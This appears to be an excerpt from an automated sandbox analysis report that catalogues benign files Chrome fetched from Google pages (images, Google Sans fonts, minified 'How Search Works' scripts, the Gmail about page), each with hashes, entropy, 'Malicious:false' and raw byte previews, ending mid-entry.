                                                                                                                                                                                                                                                                                          SSDEEP:192:3vU3EL5KGd8MjY+tCuDwELqk6LF9t86pEaAm6:38A4Gd5M3KDLqlpfREat6
                                                                                                                                                                                                                                                                                          MD5:10DF50D0F76BF788DC9DB560164B9E77
                                                                                                                                                                                                                                                                                          SHA1:7CF6203371658A4F3344458C841C1CCE44AF8C4B
                                                                                                                                                                                                                                                                                          SHA-256:C5373F1E7D948DEC3485F721443313E550881C82CCE88DEFC30C1D927E953318
                                                                                                                                                                                                                                                                                          SHA-512:B9BBE09EFC3ADB5981E21096F9D0C3C2228CA58058BC685F0C15D93B91E99AFF84C0C5453EAE6FE7C34E3683524B7DA5F685F916CA7A747CC0EB869F019BF93E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....bKGD.............[IDATx..i.\Gv.......-..Iq.2"%..(....e4.1...9#'c 10.$....#H..../.$@. ..A.L.L......l..4..$..(...GR."...._o..:.p..{..}{y."....~..N...S......`....`....`....`....`....`...h........8\(.G......c...bm|L....6L.B...$..Hm.jS....H.8Z/.-K.v3....].)..bE....?t..\.n>(.nI...J.V.[..J.T..|....!]..z...].(Fb.rt...r.M......._.........Je......O..?W..j......O.$M.Lk.k}xcF.]jT.dV...+f....}.\.~..tY`.G.......r..r...%.Yk..K..L....E-....$9I..De.hx.5d..[w.0.......%x..{...*&..[W]<.m......C..%.h.V...lp,)...F.n.W3.@....&..VTE+...@c.\......m3...*....eF....<.C>...X?.p..xm!.[E...g.X.D}-.V..8...y.*(...,..,......Y.=.%....Y.x..."s6.6w.SS.8....@...C..5.....X.r.*....GB....5.c..<[R..1s`.`C.V..{3!..y._...9d.. .gX%..R`.....t...>{Fr.]dKz..f.....2...!*l0.<..fGn.Y...n`.B.&XC%..y_..../...?R..2...9.....a..~d.......F^(z.].W.;...w....P)......(.....h.G...Y`.;.,`.G.'.7Im..6o.=....4.Us..[Np....:.....JQ-{S......c.....c.,.i.."
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):93591
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9780680931935395
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:fa6hPNoG4dP1nT40FaWzTOi0mfhouZlVzY379dyqNpp5lJ9F1xMbvUDPVQgyh678:CWNo9dP1T40FaWzSFmfhphzunlDF1xMJ
                                                                                                                                                                                                                                                                                          MD5:FE4C4E75D5FEC9216CFE3022BCF42E23
                                                                                                                                                                                                                                                                                          SHA1:8D78801C8014C85D0D1659FE5B42B0746D272D19
                                                                                                                                                                                                                                                                                          SHA-256:40B6E0677C04E1E5D918A0856FFE90537390A80FCBB06E10555340BE0B32B0AF
                                                                                                                                                                                                                                                                                          SHA-512:D23E77BD956E761AD0AB15A7C50E7B6602664961DCE915AE7E78AAF9BFC5DF654BB4BFB00F8F381EB93DED6D30C3172AD9C2CCF8EA0B3527304D70227E178751
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................S........................!..."1.A2Qa.#q...BR..3b.....$Cr.....Sc..Ts.......4D...%dt................................5........................!1..AQ."a2Bq....R.....#.S.C............?..)....c..b_.H..aS.b.Q%.....q.i-8..(....*$...q.O...%....x.O.Z@.l..t....KI..TG.../A)...$W3c.....z8.(.q.....8.g...h..Zq...p...!..ca.....&..j..N7.db.Z..B.!q...-..B.~..H..X.V..cq.)^T.Ll....x.V.I..ap.......X....x...S.....<U....Xp.K.,X..&......<*....I.7..U\oX.Q&..t.2. T...h..cT..zq...F2..EKM8.aq.=....<xG. c..R.=.n"...U.I>.2..Z..]-...t.....c.zX.U...+..0..{..jQI*.y........$...q..R.5...1..5.@..cN....T..h..q...Q#.....O..Z...E\n.b.D.\{...,g...!..#.h.zx..U......1J.$c.p.t...*.|{...ck.:....b.I..4aQ...*REc.tck...U$...q.\x.)]-4c"1...*..kC.<....4b.E..x.m....EE.Ll..i.:x..\oX...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 34184, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):34184
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99444009565784
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:8pJf8lXHzTyT3P9QWCHmzL3WbHPBBWQfIKkydgMbG48B/u:u0lDTyrKWCHeL3OBDwKdmp9u
                                                                                                                                                                                                                                                                                          MD5:1ACA735014A6BB648F468EE476680D5B
                                                                                                                                                                                                                                                                                          SHA1:6D28E3AE6E42784769199948211E3AA0806FA62C
                                                                                                                                                                                                                                                                                          SHA-256:E563F60814C73C0F4261067BD14C15F2C7F72ED2906670ED4076EBE0D6E9244A
                                                                                                                                                                                                                                                                                          SHA-512:808AA9AF5A3164F31466AF4BAC25C8A8C3F19910579CF176033359500C8E26F0A96CDC68CCF8808B65937DC87C121238C1C1B0BE296D4306D5D197A1E4C38E86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............X......................................4?HVAR.k.`?STAT..'...J/<.....`..(..Z.0..N.6.$.... .....K..[O;q..w....z.....%.O.t'*.R...*.6.{..@.k......C.B..Z.uU.}..!.".....]jK.`&.\..4...US.......x..C...1g.:.+.?.t<....J...C.p.c..J...........V..H1.6.~..n.]~"R*>..s....7....FE1.S/m....}..<....M..IHB.._8.d.3"......8..t.;f._~X.A.&n.1..t..v...n.._............eS.......!V."v6.xm|M..O.z..,....,...N.1......y^7...^^.$.!.$<V..B....."j..!2..Y"..{w!..Z.[...]H....*M-.*".8j.<..X.[{..UI....ML.J.?4B.....]..4..()^Bi.4iD/..]....../I.-.J[D...........c...)63.U.rFpW5}.9$..2...t..:.MW.c.N...lK...3^......./..v. !...;..v.w./^S...\U....|.......Y9...a.z.....i..$J.U...Ks....0Q*.........iy.....M..@..........&..c.kh.(<.O.....~..#.-.gfw.t...nbo...]0'G.!.2.8....y.K..;%......_).W..?.'.DTR.H....G.Al..d......g>.6..(.."4l...3$...\_.W}..R...\.o........`..q...@XG.wpN......!....&...\.&.....N..5..n......g..bR......HV...s...e..r.0ty&.SW.j.{I...".m .s..T....l....@th:..aM.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2659
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8905442131677255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ijiUY2f6fVz+e6SX/uFRxP1Z9k5Le5+DROGSHFQuD6sQbJ4ftC7IbYjFK:iu52ifVqe6FFRxPaMYGHFQelPQ78UK
                                                                                                                                                                                                                                                                                          MD5:C399BEE3FB59500877DCEA2824E85878
                                                                                                                                                                                                                                                                                          SHA1:51B4BDB550A88F67B99A56B42B6CF10AF76AA9F3
                                                                                                                                                                                                                                                                                          SHA-256:3CF5597043FA5646F412B52D6B1FE92529801DCEA6858252724002F740230875
                                                                                                                                                                                                                                                                                          SHA-512:5F564E79C7124F770604BC07D666F5635AE94565D3D03956E4CBEA2910FA2E02736ED4E1365D7907E18C18BD5B0966BE2F1D6165E0A314541977F2F891D78E40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/1zrYQvVLwo2Mubiugujr-Gn82yOoooWQ1dyIO_ougkdqVKDU_UaL7b-i6i4JNL_7V-gRitDbpIulH5hWGdHlAxp6zoCq4fvNg2PqIvpmh0QE56eXAHA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..mp\U.......6.K_..T.i.V,....L./:~@.Kt.....Gg.......G.G?0U....CF....A..M.A.i)mc[.mh.M....?l.`_7{......-.>....s.=........p8.....p8....QsT..w..Z.........T...BkM...=z...#...A..K...e....g.e.WO.0.=...V.S:w.P.d.{..9..V..N....~..}.l...!...'w3.#.qDk.........X/./N...\.s........{..Z*_\....!...$.'......1.q......#...'w+.\...F.Tl..1.|~..U7>...dmpGOn5.C.-.'..v.~.bs.cL....%4I.._..=Jk...W,_...s.SW..2..'......z......^...r...9l..P..M..Lh.F...^~....m5uX.....Q......k/>..&.........ba.S.aXc.p.M...-..uC..U.=o.U.e.C..uCC..*;.A..M...;-.....D......4....5x.e|]`0.i.G.E.y....._V9l.wt7U.6W.0...4......b...Y...a......X..\.0..."=...y.....t'.m..c...e>-s[...P...{^.o].6...|.P.Xc"..w.Ek.j..=.p....EB...;......d..b.Z.z.z..$a4.....O....v)Eb{k;...M....R9.1..O.j.z..e(..Q..k...D...?z......u..6...>V..qAk...8.G.322L1(.T...7.i....ny......VUy....*..J.......K...G..`d.0..c.RMc..x....F...p8.....v..LZ......?.aUX........yq..t.c.&.u.)`...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2589
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897517005551768
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:gc6B/DWd+LWNZa5pAKunbUNeFklgrspiDKyl8KyZqkTsVFtpEkhy:uB7bLQNKunIAF4mKyZRyEFdy
                                                                                                                                                                                                                                                                                          MD5:60CBC0D927388FDCCFFCBEDE444BBE31
                                                                                                                                                                                                                                                                                          SHA1:9711037A70336CBDE2695D46EDE582E211D81CBF
                                                                                                                                                                                                                                                                                          SHA-256:42A62B13D9ED82073E22A8752216EDDDE216436C72F2B1E1DEF9A50C0910C8B0
                                                                                                                                                                                                                                                                                          SHA-512:47A37FDBEC16161AD3CF7DBC4780E71AE71B7E08A86BC39833DB1B532A3F5C2E4CB302568ACDCB8337D0E84276A8F912F04904AC6539593BC50BC211E0B610A1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..Ml............9@.G...?B..`C._...#...P)I.CS......RsI#zj...`..J..V..5....8......P..T....{....?vwf.w............;.3...........#.......Z!..~..=|U.....|.-g..).^...|...<H.,.v....p..t~......chp.V. .<...sA>..\...{.r..y&.gb....N..nt....2W.#.rF]...9:.+gi.N.lo.`Z.LD.WGBE....?6-d:"..'.......RD.{C.8t..m.i!....!*:p}S.j.:.&2.[.D...0....fG.oM..Od..(.r..m...@.......mZ.D......m).""..Dt.i...>".ysc.r..".}..N..#.}F`.W..*!2....ho[ejxd..4....... P]gjtdp......... .2S..~.(.M.;.P].....a...F.....t.aE?......]Xbj.o......v!w..4.4..y.h.O.........U.....s5....bh...<UYt.).. .^.............*..ig.H....b6.Z.&....\...;5....g.k|.QSxbp1.x.x.X..z........$B.@7EU.....l|......E.>....e...>.<...\..E'.....4y).\.i.8St..L...l*.."......P....8.N|.i!..(..]...N|....CL..T....aZH..M.....*....&.r..$l...R....>g..x..`9.1.20.$l....+....Y.q....:T.M.."gr....:.^.g..H...s......Y.....Ay=.1>..X6a2..1}...`.W.................zA^.J.O...&....2.3.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):550440
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5676135591183287
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:OiMSYySvJgMe2Z/RPSCIZ+mxsUAWyo1XiMRdma6DdY5lkVvk9ZTK:KSYyOfe2Z/RPSL+Af19dmacdY3Xo
                                                                                                                                                                                                                                                                                          MD5:22BB0C949C71C5ABF61C6C3088C4252F
                                                                                                                                                                                                                                                                                          SHA1:B30960D75F76ABF0CFEE9711F2F88F5569B763A7
                                                                                                                                                                                                                                                                                          SHA-256:A638BBB6B266673115B902ABC5094C813228EEC65955AFFD3E6AB7EFD2F34A55
                                                                                                                                                                                                                                                                                          SHA-512:EF53A1A28136712A394A0A07F7C9CE8A2DCE02CD4368DC1B87CF0511C806539BFE04AC4F43156B92805E55C867A354338EC05AC55AC1E95FB8C500BD8401D5D7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/YqGm39Z5sh9A5xtQbH_iZFAKj6kwCkY447q5cjzGcb85qccGrZn5xO_N_XwKpx1nd3XA-l6tJyz2qk7Xxk8ThS1-W78mBoEfPVKF4hm4=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF f..WEBPVP8L.f../..D..u!...R.....G..........ea._d....T..E......&...9..t.h<...L..=...,.%N.C"..x...:.&...M..&.m....;..d.]..6e......:w.%`6N..sd.....H.F#.....{}?...+i...t.?<...Nr.[....{.g4...lI.Q...'..s.{./333.eff........kg..-%.c.v$Y....{.....x.........|....olc.(.a..I..Y.....l1[.l........{....B.?..#..%..,.l .L..H.....}a.vl.$[.y..Df.z...9l..6m.6..m.5l.Xj.;#..X.mUm:I...}o<.......8.m.V.wwB...c.).9.d..oU.O...5r.......2W.......PD>."IVme.}+.$..;._.....wf..1.d.m..$..... ..)....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1196)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1684
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.253406765425037
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:HlJapDAMVK1BtV0oRgAR5VF9qiTvvKyrdrSaGW6xEuZ1F8pYSHy/:aZK190bAFrqizPJrSxZ46
                                                                                                                                                                                                                                                                                          MD5:5B3CECC8B01A4C47588E747F9F979EDD
                                                                                                                                                                                                                                                                                          SHA1:11FB2BEDE891F96330A54CAD7D84D4357A2FBCF2
                                                                                                                                                                                                                                                                                          SHA-256:69A82DD792864C3651FC5FC0296220FBEEE55334EF04EEBB84C943D5B286DC41
                                                                                                                                                                                                                                                                                          SHA-512:27752B6620B2E83FF08E0F1F10F38D8157997B6D4C4EEC57DB412281411AF3BD151E55D90D1373EC56F0CA53AD7263C4603F96D941D0CC8EB6A8973BAE79C2CB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/u_mMVaZ5.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as m,s as d,x as p}from"./ycaG4YXp.min.js";import{e as c}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{i as u}from"./IFunn9hk.min.js";import{o as y}from"./5Ss99t85.min.js";const h=":host{width:100%}details{width:100%}summary{list-style:none;display:flex;gap:12px;justify-content:space-between;align-items:center}summary::-webkit-details-marker{display:none}summary:hover{cursor:pointer}.icon{transition:all .3s ease-in-out;transform:rotate(0);transform-origin:center;display:flex;justify-content:center;align-items:center}details[open] .icon{transform:rotate(180deg)}.details--hsw .summary{padding:24px 0;border-bottom:1px solid var(--details-border-color, #dadce0);color:#202124;font-family:Google Sans Text,Roboto,Noto,sans-serif;font-size:16px;line-height:24px;font-weight:400;letter-spacing:.1px;color:#3c4043;font-weight:500}.details--hsw .content{padding:0}";var v=Object.defineProperty,w=Object.getOwnPropertyDescriptor,n=(l,e,o,r)=>{for(var t=r>1?void 0:r?w(e,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19888, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):19888
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.987948964405281
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:bb009QR0L5ARWJ9GExHnnD+3kygF2SMeFyFGz9Uchqi14DmX4YqwTgCRO:bblQg5xHbyeXMeFys9F4jYZTfO
                                                                                                                                                                                                                                                                                          MD5:609262AF4B5AED721D5A82480BE1004E
                                                                                                                                                                                                                                                                                          SHA1:0F6E12D719B5EE65A98EA5E5C5887ABFE3C00408
                                                                                                                                                                                                                                                                                          SHA-256:649674E87A90AE80D5F886BF2F6974BA32282A669D0D5619ADF550B5C669E05E
                                                                                                                                                                                                                                                                                          SHA-512:712FF9C297B5519D6F3182614683CE87FC37FB00F1C43DF3C2816655D06CABEC0441A56D2AAC441056F9E9C318B7BDBDBEB0E00C36A7DBE8D611482009D39299
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjwUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......M...........M>..........................-..R.. ?HVAR...`?STAT..'...b/<.........R.0...6.$.. . ..B..%.....7.y.I&.6 .........A?......6....f.....T..>r;..jY.e.4L.rm.}t....%X".-$.#c..'v.V..Gt. ...0u.....!.....p....5l......Xb......-3q.....(.....B.*.).IA.?.(.KduM...}..P..u).'.Q%..4..5..<..f..{....K.X.......7..h....n.p..W.A....?..k.....7.+....=o.t).PZ.K.`#X......1...4@T,..%...b....lH.1..P..$.CA.tv..W...$...h.........G .AM.5}...^...i....._.D..(.C"E$....D..M...`Q../2.W....e,.T..P......~......s.x.F.E.3..S.S_.......D4....5~..@....HL<_...[.CI..f**..,sl...+&9...g+...F.C\|...m..h.~1n.b....?.N..1..-AQ.o.)...v{.&h.F..x..3q.f.L.U'Sl.(p..H.H.D......A.@...l/...q.n.8.~D.......l.\9..d,.....@...z}.M....Ax.........}^fI.gRpZ^..P(.6....._..%..(...l@...c.v%G./L.9...iq....\.....iy.Om.`fw.AyQ.R.E;p..B'.M...-..Y..-Yrk...!...7.j0..4..&....p[coiY.YP..|$..r......k.........)..|.D...y(.o:,......R{s?D.`...........k.U.0h|e%*..L....-.V.0...v&;..2.h]H...d...<.....;M........... ..!
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (653)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1156
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265920662110145
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:7p3alJltDIY8mMiO34abbiqHJwGzIXfOoPXSHcm:7yZVal+izQfFCHcm
                                                                                                                                                                                                                                                                                          MD5:C981B56DE2127ADB94673063364DCCB7
                                                                                                                                                                                                                                                                                          SHA1:3DFA5C46FF79B2AA4187E59B1D9F6D5CE014C307
                                                                                                                                                                                                                                                                                          SHA-256:01FA267B79C00613318CF18A88058DEB4C1C1A3176931BF9D05A549873854BBF
                                                                                                                                                                                                                                                                                          SHA-512:00FF2B4202567CF3B7B263A9A5EE8EBB664C817EE01F0D2F9381DF2A2272F822B0DA753673A7E384B86738814F1793DC582296358558700452C441E3BFD49A54
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/J8wBfiw3.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as d,s as a,x as i}from"./ycaG4YXp.min.js";import{e as p}from"./0XPwTFcg.min.js";import{n as b}from"./IYoTYjYE.min.js";import{e as v}from"./p9kcPq91.min.js";import{Y as h}from"./rwBjrn-0.min.js";const m=".button:hover{cursor:pointer}";var f=Object.defineProperty,C=Object.getOwnPropertyDescriptor,c=(o,r,l,s)=>{for(var e=s>1?void 0:s?C(r,l):r,n=o.length-1,u;n>=0;n--)(u=o[n])&&(e=(s?u(r,l,e):u(e))||e);return s&&e&&f(r,l,e),e};let t=class extends a{constructor(){super(...arguments),this.youtubeModalController=new h(this)}connectedCallback(){super.connectedCallback(),this.youtubeModalController.init({videoId:this.videoId})}render(){return i`. ${this.videoId?i`. <slot. class="button". @click=${()=>this.handleClick()}. @focus=${()=>{const o=new CustomEvent("youtube-card-focus",{bubbles:!0,composed:!0});this.dispatchEvent(o)}}. ></slot>. `:i`<slot></slot>`}. `}handleClick(){this.youtubeModalController.open()
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 11912, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):11912
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.981906398216956
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:rFja6j8EFw5z0HjzlBWz+XQ4DSv8UvLuflA3x/a6ZAVpt95H/a8QA:rBa6gcsKU+XQ4ev8UvLuflKJa6KVpt3d
                                                                                                                                                                                                                                                                                          MD5:8D748A5255279CA8E2D7C839D0A8E115
                                                                                                                                                                                                                                                                                          SHA1:044CCD49841070BD630DB6F6D3879539676CFA9F
                                                                                                                                                                                                                                                                                          SHA-256:E5B0879C3D09D13A9D440E74EF1210DE2BAEE9E5CCCDC5DE265C6CC04B323239
                                                                                                                                                                                                                                                                                          SHA-512:645D76FCA652AAC1392EF471775AE99F6E6D408F6ACEA9A3EA02D64ACCE7A52DEC825CB6AD49A1AB4F4DC1ED1B84EC7C5F6D4E5ACE91B29BCD32824080B82E7A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjAUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............nH..............................r..:..h?HVAR...`?STAT..'..../<....$.{..L.0...6.$.... ..B......ud....n......B.....{rC.`.ts.zPd;J.AZ*.4.9...$.........\.....$4].j.@.U.`z...s_...Y.V.z...&MO........s....a..,J..$..@.XG...V._..WR.'.hX$X.X.N,~.;._..Ha).h.......D4..u.J......o*......{.........6D...4.!.^]c.#A.i..M...Q.L......t.-.m.~.Lk.n.*T........3...'\.9@.....B."1.;....Il..a..q.%.a......Y.X?...R..Y"}Q...d.M ..'2!...Lm{...D.h-..v"..x4.o.Om.i..J.I.G.6....B*.1....!....s.&G.@~.*....p..W.o. <.......{R.v.g.E.a./....t.+..pw&..X......2q.`...&."T}..................$`#..P..S=\9..qQ......1.!!. ......\a..t...:.r.v3.!U..=.Gt.......M.v.b.V6.....7[2.~....Vp 2.).....w...|...".V(...}.I-.N..&...gy...Q.......e.........|>.....Q..)a.>{......`....d=.....!.,..r..z.......P...O...\...... .:....t.".......p..`uG .6y8_,W..+e\H..u>...W.......C......`...>)..... ..(+?.d..4....i=0Z.....(......(yLl\.B.....)...|.\k....D....91..?!r/.)..Ot)...3..v.Ny...Qp.H...'..0w
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9413)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):192788
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.037941826961467
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:AxhnnY5NUObpnm49ZoNo41g21CLB+z/A9qg21CyCg21CycOjFjwB0GjRzAqRt6lU:AqbvojF
                                                                                                                                                                                                                                                                                          MD5:CB86B5ECD17A93869880C86B488C3E16
                                                                                                                                                                                                                                                                                          SHA1:AE1C34BDB36EAC292B673C3D3B496BE5489AA863
                                                                                                                                                                                                                                                                                          SHA-256:5521A65F77398ACA1647A7052C0028AF601379652690D2AA7A4D02F1144D364B
                                                                                                                                                                                                                                                                                          SHA-512:C985901DA8FF09296C0A9CE3917F322780D62EDAFD061E73B9A6D30B90E174CA23C0FB2D6D9AA77A56C1394B6FF4804D166D19D550CF832F75A5F965DF70A65C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/intl/en-US/gmail/about/
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html. lang="en". dir="ltr".>. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>. <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Google+Sans+Display|Google+Sans:400,500|Google+Sans+Text:400,500&amp;display=swap" nonce="uUlxk7t1cf_8s36LBBN08w">. <link href="https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.css" rel="stylesheet" nonce="uUlxk7t1cf_8s36LBBN08w">. <meta name="google-site-verification" content="8ZPCvu3K2vlLx3cdYn9ebZNwVctgejkNgHnwNcxoxkA" />.. <title>Gmail: Private and secure email at no cost | Google Workspace</title>. <meta name="description" content="Discover how Gmail keeps your account &amp; emails encrypted, private and under your control with the largest secure email service in the world.">. <link rel="canonical" href="https://www.google.com/gmail/about/">.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1176378
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985316141737791
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:bT4uf5zddWpPi+jz8XkZtj/wk4lzvNtOC/A/VMvTwkaag+oZqpQHMfiHTVm1WI:Hx52PiVqtj4blzvNN/CEwk3KZ2QqiHM
                                                                                                                                                                                                                                                                                          MD5:780612C2558D00C14B164967E8D688C1
                                                                                                                                                                                                                                                                                          SHA1:84CF83203EDFA0D1BA5262B5B9704A8073A9C518
                                                                                                                                                                                                                                                                                          SHA-256:DDD08008C6ECAC5C8FD4EC9F5E9E92031859A83AC4DCE996A9B3842897D85233
                                                                                                                                                                                                                                                                                          SHA-512:74CCF0AD3BD98744B2261ECB8BAB3110845EF404441A8068B1A75573A259FB3B5A033FB2DDE692A985E4A16F22B8CD7950CC2CAC0D151A6D584E7AE0F5CBB01D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 16:44:00......................................................2022:09:08 16:44:00..2......pHYs................XiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exi
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65255)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):72214
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.327460393102125
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:auJ29KBROpgAEQ9a1tgwA6NSZW3ytdKTdIwEp28Ywz7CDE:f29CakgwdNSQ3yt8eNp28YqCA
                                                                                                                                                                                                                                                                                          MD5:47DA594CBECE0E34A656E6BF2490B7C3
                                                                                                                                                                                                                                                                                          SHA1:2D26F4C060491AC980D09CA687388D3610256EB7
